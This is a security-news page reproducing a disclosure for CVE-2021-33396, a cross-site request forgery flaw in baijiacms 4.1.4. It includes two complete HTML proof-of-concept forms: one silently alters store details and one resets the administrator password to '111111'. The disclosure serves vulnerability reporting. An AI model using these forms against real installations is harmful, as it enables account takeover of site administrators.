Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-33396: There is a CSRF vulnerability · Issue #7 · baijiacms/baijiacmsV4

Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php.

CVE
Open in Source
#csrf#vulnerability#web#php

Vulnerability description

A csrf vulnerability was discovered in baijiacmsV4.
There is a CSRF attacks vulnerability.After the administrator logged in, open the following two page,attacker can modify the store information and login password.
1.modify the store information.
poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="sname" value="xxx" />
      <input type="hidden" name="website" value="xxx" />
      <input type="hidden" name="fullwebsite" value="http&#58;&#47;&#47;xxx&#47;" />
      <input type="hidden" name="status" value="1&apos;" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;index&#46;php" />
      <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;admin&#46;php" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Original store information

When a logged in administrator opens a malicious web page and clicks the button

And the store information has changed

2.modify login password.
poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="newpassword" value="111111" />
      <input type="hidden" name="confirmpassword" value="111111" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When a logged in administrator opens a malicious web page and clicks the button.

And the login password of the administrator will be 111111.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE